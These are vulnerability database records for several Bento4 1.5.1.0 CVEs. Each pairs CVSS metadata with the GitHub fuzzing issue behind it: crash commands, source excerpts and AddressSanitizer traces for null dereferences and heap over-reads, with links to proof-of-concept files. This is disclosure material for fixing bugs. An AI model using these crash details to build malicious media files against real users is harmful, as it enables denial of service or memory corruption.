2019-09-30T07:47:11Z
2019-10-08T05:14:45Z
https://github.com/axiomatic-systems/Bento4/issues/436
500,109,805
436
CVE-2019-17453
2019-10-10T17:15:17.843
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_DescriptorListWriter::Action in Core/Ap4Descriptor.h, related to AP4_IodsAtom::WriteFields in Core/Ap4IodsAtom.cpp, as demonstrated by mp4encrypt or mp4compact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/436" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/437" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/437
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 Encrypter - Version 1.6 (Bento4 Version 1.5.1.0) **Command** mp4encrypt --method OMA-PDCF-CBC --show-progress POC /dev/null **ASAN Output** ``` fuzzer@thickfuzzer:~/victim/Bento4$ ./mp4encrypt --method OMA-PDCF-CBC --show-progress /home/fuzzer/victim/Bento4/cmakebuild/out3/4/crashes/unique/manul-1569860171-4-14003_id5_1.mp4 /dev/null WARNING: track ID 1 will not be encrypted ASAN:DEADLYSIGNAL ================================================================= ==11724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005a42f4 bp 0x7ffdb06d0290 sp 0x7ffdb06d01b0 T0) #0 0x5a42f3 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 #1 0x6c7886 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x6c7886 in AP4_InitialObjectDescriptor::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:300 #3 0x5ff8a8 in AP4_Expandable::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Expandable.cpp:105:5 #4 0x5ebc24 in AP4_IodsAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:99:36 #5 0x5961a1 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #6 0x59b9b2 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #7 0x587216 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #8 0x587216 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:232 #9 0x5961a1 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #10 0x59b9b2 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #11 0x5b092e in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #12 0x5b092e in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Processor.cpp:644 #13 0x529852 in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Encrypt/Mp4Encrypt.cpp:654:18 #14 0x7fdf1c6f482f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x451428 in _start (/home/fuzzer/victim/Bento4/mp4encrypt+0x451428) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==11724==ABORTING ```
SEGV in mp4encrypt
https://api.github.com/repos/axiomatic-systems/Bento4/issues/437/comments
0
2019-09-30T16:31:42Z
2019-10-08T05:14:30Z
https://github.com/axiomatic-systems/Bento4/issues/437
500,387,590
437
CVE-2019-17454
2019-10-10T17:15:17.907
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_Descriptor::GetTag in Core/Ap4Descriptor.h, related to AP4_StsdAtom::GetSampleDescription in Core/Ap4StsdAtom.cpp, as demonstrated by mp4info.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/435" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/435
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 File Info - Version 1.3.4 (Bento4 Version 1.5.1.0) **Command** mp4info --show-samples POC-file **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==17894==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000583949 bp 0x7ffd5359b2c0 sp 0x7ffd5359b1f0 T0) #0 0x583948 in AP4_Descriptor::GetTag() /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:61:42 #1 0x583948 in AP4_DescriptorFinder::Test(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:92 #2 0x582ce9 in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:431:13 #3 0x582ce9 in AP4_EsDescriptor::GetDecoderConfigDescriptor() const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4EsDescriptor.cpp:207 #4 0x5b7151 in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:583:13 #5 0x5b8df8 in AP4_MpegVideoSampleDescription::AP4_MpegVideoSampleDescription(unsigned short, unsigned short, unsigned short, char const*, AP4_EsdsAtom*) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:801:5 #6 0x6b2e80 in AP4_MpegVideoSampleEntry::ToSampleDescription() /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:934:16 #7 0x5ae4b2 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181:39 #8 0x6912f5 in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp:207:25 #9 0x5868e4 in AP4_Track::GetSampleDescription(unsigned int) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Track.cpp:445:28 #10 0x52b2a7 in ShowTrackInfo_Text(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1152:46 #11 0x52b2a7 in ShowTrackInfo(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1276 #12 0x52a66c in ShowTracks(AP4_Movie&, AP4_List<AP4_Track>&, AP4_ByteStream&, bool, bool, bool, bool) /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1386:9 #13 0x527cd8 in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1650:13 #14 0x7f473c79282f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #15 0x4521f8 in _start (/home/fuzzer/victim/Bento4/mp4info+0x4521f8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:61:42 in AP4_Descriptor::GetTag() ==17894==ABORTING ```
SEGV in mp4info
https://api.github.com/repos/axiomatic-systems/Bento4/issues/435/comments
2
2019-09-29T20:00:36Z
2020-10-17T21:37:46Z
https://github.com/axiomatic-systems/Bento4/issues/435
499,963,127
435
CVE-2019-17528
2019-10-12T20:15:11.487
An issue was discovered in Bento4 1.5.1.0. There is a SEGV in the function AP4_TfhdAtom::SetDefaultSampleSize at Core/Ap4TfhdAtom.h when called from AP4_Processor::ProcessFragments in Core/Ap4Processor.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamSeri0us/pocs/tree/master/bento4" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/432" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/432
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_TfhdAtom::[email protected]___SEGV_UNKNOW ### description An issue was discovered in bento4 1.5.1.0, There is a/an SEGV_UNKNOW in function AP4_TfhdAtom::SetDefaultSampleSize at Ap4TfhdAtom.h-80 ### commandline mp4edit @@ a.mp4 ### source ```c 76 void SetSampleDescriptionIndex(AP4_UI32 indx) { m_SampleDescriptionIndex = indx; } 77 AP4_UI32 GetDefaultSampleDuration() { return m_DefaultSampleDuration; } 78 void SetDefaultSampleDuration(AP4_UI32 duration) { m_DefaultSampleDuration = duration; } 79 AP4_UI32 GetDefaultSampleSize() { return m_DefaultSampleSize; } 80 void SetDefaultSampleSize(AP4_UI32 size) { m_DefaultSampleSize = size; } 81 AP4_UI32 GetDefaultSampleFlags() { return m_DefaultSampleFlags; } 82 void SetDefaultSampleFlags(AP4_UI32 flags) { m_DefaultSampleFlags = flags; } 83 84 void UpdateFlags(AP4_UI32 flags); 85 ``` ### bug report ```txt ASAN:SIGSEGV ================================================================= ==16948==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x000000498774 bp 0x7ffdcfa6e2e0 sp 0x7ffdcfa6df60 T0) #0 0x498773 in AP4_TfhdAtom::SetDefaultSampleSize(unsigned int) /src/bento4/Source/C++/Core/Ap4TfhdAtom.h:80 #1 0x498773 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) /src/bento4/Source/C++/Core/Ap4Processor.cpp:331 #2 0x4a68d0 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /src/bento4/Source/C++/Core/Ap4Processor.cpp:711 #3 0x43f413 in main /src/bento4/Source/C++/Apps/Mp4Edit/Mp4Edit.cpp:451 #4 0x7fc7db40082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x442b88 in _start (/src/aflbuild/installed/bin/mp4edit+0x442b88) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/bento4/Source/C++/Core/Ap4TfhdAtom.h:80 AP4_TfhdAtom::SetDefaultSampleSize(unsigned int) ==16948==ABORTING ``` ### others from fuzz project pwd-bento4-mp4edit-00 crash name pwd-bento4-mp4edit-00-00000631-20190828.mp4 Auto-generated by pyspider at 2019-08-28 22:40:24 please send email to [email protected] if you have any questions. [poc3.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640457/poc3.tar.gz)
SEGV_UNKNOW was discovered in AP4_TfhdAtom::SetDefaultSampleSize in Ap4TfhdAtom.h-
https://api.github.com/repos/axiomatic-systems/Bento4/issues/432/comments
0
2019-09-23T02:21:12Z
2019-10-08T05:15:45Z
https://github.com/axiomatic-systems/Bento4/issues/432
496,867,693
432
CVE-2019-17529
2019-10-12T20:15:11.567
An issue was discovered in Bento4 1.5.1.0. There is a heap-based buffer over-read in AP4_CencSampleEncryption::DoInspectFields in Core/Ap4CommonEncryption.cpp when called from AP4_Atom::Inspect in Core/Ap4Atom.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamSeri0us/pocs/tree/master/bento4" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/430" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/430
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_CencSampleEncryption::[email protected]___heap-buffer-overflow ### description An issue was discovered in bento4 1.5.1.0, There is a/an heap-buffer-overflow in function AP4_CencSampleEncryption::DoInspectFields at Ap4CommonEncryption.cpp-3437 ### commandline mp4dump --verbosity 2 @@ ### source ```c 3433 info += 2; 3434 for (unsigned int j=0; j<num_entries; j++) { 3435 unsigned int bocd = AP4_BytesToUInt16BE(info); 3436 AP4_FormatString(header, sizeof(header), "sub-entry %04d.%d bytes of clear data", i, j); 3437 inspector.AddField(header, bocd); 3438 unsigned int boed = AP4_BytesToUInt32BE(info+2); 3439 AP4_FormatString(header, sizeof(header), "sub-entry %04d.%d bytes of encrypted data", i, j); 3440 inspector.AddField(header, boed); 3441 info += 6; 3442 } ``` ### bug report ```txt ================================================================= ==20093==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61300000dfee at pc 0x00000060256b bp 0x7ffdb67cdb90 sp 0x7ffdb67cdb80 READ of size 4 at 0x61300000dfee thread T0 #0 0x60256a in AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3437 #1 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #2 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #3 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #4 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #5 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #6 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #7 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #8 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #9 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #10 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #11 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #12 0x43f769 in main /src/bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350 #13 0x7f7d03b2b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x4434e8 in _start (/src/aflbuild/installed/bin/mp4dump+0x4434e8) 0x61300000dfee is located 0 bytes to the right of 366-byte region [0x61300000de80,0x61300000dfee) allocated by thread T0 here: #0 0x7f7d045066b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) #1 0x536f2f in AP4_DataBuffer::ReallocateBuffer(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x536f2f in AP4_DataBuffer::SetDataSize(unsigned int) /src/bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3437 AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) Shadow bytes around the buggy address: 0x0c267fff9ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bc0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c267fff9bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c267fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]fa fa 0x0c267fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==20093==ABORTING ``` ### others from fuzz project pwd-bento4-mp4dump-02 crash name pwd-bento4-mp4dump-02-00000034-20190811.mp4 Auto-generated by pyspider at 2019-08-11 19:37:41 please send email to [email protected] if you have any questions. [poc1.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640451/poc1.tar.gz)
A heap-buffer-overflow was discovered in AP4_CencSampleEncryption::DoInspectFields in Ap4CommonEncryption.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/430/comments
0
2019-09-23T02:16:44Z
2019-10-08T05:16:10Z
https://github.com/axiomatic-systems/Bento4/issues/430
496,866,994
430
CVE-2019-17530
2019-10-12T20:15:11.643
An issue was discovered in Bento4 1.5.1.0. There is a heap-based buffer over-read in AP4_PrintInspector::AddField in Core/Ap4Atom.cpp when called from AP4_CencSampleEncryption::DoInspectFields in Core/Ap4CommonEncryption.cpp, when called from AP4_Atom::Inspect in Core/Ap4Atom.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/TeamSeri0us/pocs/tree/master/bento4" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/431" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/431
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_PrintInspector::[email protected]___heap-buffer-overflow ### description An issue was discovered in bento4 1.5.1.0, There is a/an heap-buffer-overflow in function AP4_PrintInspector::AddField at Ap4Atom.cpp-974 ### commandline mp4dump --verbosity 2 @@ ### source ```c 970 m_Stream->WriteString(" = ["); 971 unsigned int offset = 1; 972 char byte[4]; 973 for (unsigned int i=0; i<byte_count; i++) { 974 AP4_FormatString(byte, 4, " %02x", bytes[i]); 975 m_Stream->Write(&byte[offset], 3-offset); 976 offset = 0; 977 } 978 m_Stream->Write("]\n", 2); 979 } ``` ### bug report ```txt ================================================================= ==4107==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009d76 at pc 0x0000004dcdcb bp 0x7ffc9fc51e20 sp 0x7ffc9fc51e10 READ of size 1 at 0x611000009d76 thread T0 #0 0x4dcdca in AP4_PrintInspector::AddField(char const*, unsigned char const*, unsigned int, AP4_AtomInspector::FormatHint) /src/bento4/Source/C++/Core/Ap4Atom.cpp:974 #1 0x601dab in AP4_CencSampleEncryption::DoInspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4CommonEncryption.cpp:3429 #2 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #3 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #4 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #5 0x58b005 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #6 0x58b005 in AP4_ContainerAtom::InspectFields(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4ContainerAtom.cpp:210 #7 0x4d3dae in AP4_Atom::Inspect(AP4_AtomInspector&) /src/bento4/Source/C++/Core/Ap4Atom.cpp:263 #8 0x58b005 in AP4_AtomListInspector::Action(AP4_Atom*) const /src/bento4/Source/C++/Core/Ap4Atom.h:530 #9 0x58b005 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /src/bento4/Source/C++/Core/Ap4List.h:353 #10 0x58b005 in 